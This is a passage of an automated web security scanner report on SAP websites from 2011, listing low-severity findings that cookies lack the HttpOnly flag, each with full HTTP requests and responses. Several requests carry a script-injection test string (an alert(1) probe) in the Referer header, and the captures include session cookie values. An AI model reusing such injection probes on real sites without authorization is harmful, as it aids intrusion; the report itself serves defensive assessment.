P3P: CP="CAO PSA OUR"
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:31 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fforum.jspa%3fforumID%3d209%26start%3d0; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:32 GMT
Content-Length: 86

var omni_value = '50271dcd-9baa-4ef3-893c-9fb47c6b6fd7';
var omni_ttc = '1318688493';
12.110. https://www.sap.com/profile/captcha.epimg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/captcha.epimg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/captcha.epimg?eqs=80FDF91121181B29096FDBF8C13490FC3D78E210BA998B1C50C73CC97CDD1CB5 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://www.sap.com/profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4605
Content-Type: image/jpeg
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:15 GMT

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......<...."..............................
...[SNIP]...
12.111. https://www.sap.com/profile/login.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/login.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/login.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 126
Content-Type: text/html; charset=utf-8
Location: /host.epx
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:40 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:40 GMT; path=/
Set-Cookie: pmereturnurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fpmelayer%3dtrue; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:39 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/host.epx">here</a>.</h2>
</body></html>
12.112. https://www.sap.com/profile/slogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/slogin.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/slogin.epx?pmelayer=true&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/about-sap/events/worldtour/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:44 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:44 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:43 GMT
Content-Length: 12160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
12.113. https://www.sap.com/profile/warning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /profile/warning.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /profile/warning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 5057
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:52 GMT
Connection: close


<html>
   <head>
       <title>SAP - PLEASE REVIEW YOUR REGISTRATION.</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-L
...[SNIP]...
12.114. https://www.sap.com/sme/contactsap/FormCodesRemote.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/FormCodesRemote.epi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /sme/contactsap/FormCodesRemote.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
Content-Length: 86
Origin: https://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: https://www.sap.com/sme/contactsap/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

{"method":"GetCodeTranslationsByParentCategoryWithLocaleID","arguments":[1,"",2,1033]}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:32 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:32 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:31 GMT
Content-Length: 36

"new Array(1,'',2,1033,new Array())"
12.115. https://www.sap.com/sme/contactsap/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /sme/contactsap/index.epx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/contactsap/index.epx HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/search/search-results.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:25 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:25 GMT
Content-Length: 87585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
12.116. http://www.sapphirenow.com/madrid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /madrid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /madrid HTTP/1.1
Host: www.sapphirenow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/sapphirenowsaptechedmadrid/ChooseYourExperience..htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/7.5
Content-Type: text/html; charset=UTF-8
Date: Sat, 15 Oct 2011 14:23:01 GMT
Location: http://www.sapphirenow.com/madrid/
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
X-Powered-By: ASP.NET
Content-Length: 157

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.sapphirenow.com/madrid/">here</a></body>
12.117. http://www.sapvirtualevents.com/App_Themes/Default/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /App_Themes/Default/default.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/default.css HTTP/1.1
Accept: text/css
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: text/css
Date: Sat, 15 Oct 2011 15:17:16 GMT
Accept-Ranges: bytes
ETag: "0e77a43708acc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Fri, 14 Oct 2011 12:53:26 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 70953

.../*html
{
height:100%;
scrollbar-arrow-color:#008FCB;
scrollbar-track-color:#008FCB;
scrollbar-face-color:#008FCB;
scrollbar-highlight-color:#008FCB;
scrollbar-3dlight-color:#008FCB;
scroll
...[SNIP]...
12.118. http://www.sapvirtualevents.com/App_Themes/Default/form.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /App_Themes/Default/form.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/form.css HTTP/1.1
Accept: text/css
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: text/css
Date: Sat, 15 Oct 2011 15:17:35 GMT
Accept-Ranges: bytes
ETag: "05f2d1b3771cc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Mon, 12 Sep 2011 10:31:18 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 1482

.outtaHere {
   position:absolute;
   left:-3000px;
}
/* selects */
.selectArea {
   position:relative;
   height:20px;
   float:left;
   color:#fff;
   font-size:12px;
   font-weight:bold;
   line-height:2
...[SNIP]...
12.119. http://www.sapvirtualevents.com/App_Themes/Default/images/sap-logo.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /App_Themes/Default/images/sap-logo.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /App_Themes/Default/images/sap-logo.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: image/png
Date: Sat, 15 Oct 2011 15:17:35 GMT
Accept-Ranges: bytes
ETag: "03dee14766ccc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 06 Sep 2011 09:19:30 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 2383

.PNG
.
...IHDR...B...!.....m4}.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
12.120. http://www.sapvirtualevents.com/css/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /css/thickbox.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/thickbox.css HTTP/1.1
Accept: text/css
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: text/css
Date: Sat, 15 Oct 2011 15:17:33 GMT
Accept-Ranges: bytes
ETag: "0c05016e066cc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 30 Aug 2011 06:43:12 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 2757

...#TB_window {
color: #333333;
font: 12px Arial,Helvetica,sans-serif;
}
#TB_window .close {
background: url("../images/btn-close.png") no-repeat scroll 0 0 transparent;
height:
...[SNIP]...
12.121. http://www.sapvirtualevents.com/css/timetable.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /css/timetable.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/timetable.css HTTP/1.1
Accept: text/css
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: text/css
Date: Sat, 15 Oct 2011 15:17:16 GMT
Accept-Ranges: bytes
ETag: "01b67931d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Tue, 05 Jul 2011 14:12:30 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 1250

...#holder
{
font-family: Arial;
font-size: 12px;
width: 100%;
}
.scheduled
{
background: none repeat scroll 0 0 #E4E4E4;
border-top: 5px solid #FFFFFF;
border-right:
...[SNIP]...
12.122. http://www.sapvirtualevents.com/js/Constant.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/Constant.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Constant.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:33 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 1477

...var Global_Const_Keynotes = 'Keynotes';
var Global_Const_Innovation = 'Innovation';
var Global_Const_Ecosystem = 'Ecosystem';


var Global_Const_Studio1 = "Studio 1 - Keynote Theater";
va
...[SNIP]...
12.123. http://www.sapvirtualevents.com/js/DateFormatter.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/DateFormatter.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/DateFormatter.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:15 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=36AEB751A4C233CE8FEA8D36CE68B1EF; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 4218

.../*
* Date Format 1.2.3
* (c) 2007-2009 Steven Levithan <stevenlevithan.com>
* MIT license
*
* Includes enhancements by Scott Trenda <scott.trenda.net>
* and Kris Kowal <cixar.com/~kris.kowal/
...[SNIP]...
12.124. http://www.sapvirtualevents.com/js/EditProfile.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/EditProfile.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/EditProfile.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:35 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 5139

...
var frame_id_ = "layer-frame_";
var _callback_handler_ = null;
var _warning_dialog = null;
var dialog_id_ = "layer-dialog_";


/* ===== DIALOG HANDLERS ===== */


// NO DIALOG
functio
...[SNIP]...
12.125. http://www.sapvirtualevents.com/js/InitiateCall2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /js/InitiateCall2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/InitiateCall2.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://www.sapvirtualevents.com/teched?d8105'-alert(1)-'ed14687c86f=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.sapvirtualevents.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Vary: Accept-Encoding
Content-Type: application/x-javascript
Date: Sat, 15 Oct 2011 15:17:35 GMT
Accept-Ranges: bytes
ETag: "0a8726e1d3bcc1:0"
Set-Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; path=/
Last-Modified: Tue, 05 Jul 2011 14:11:28 GMT
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 9852

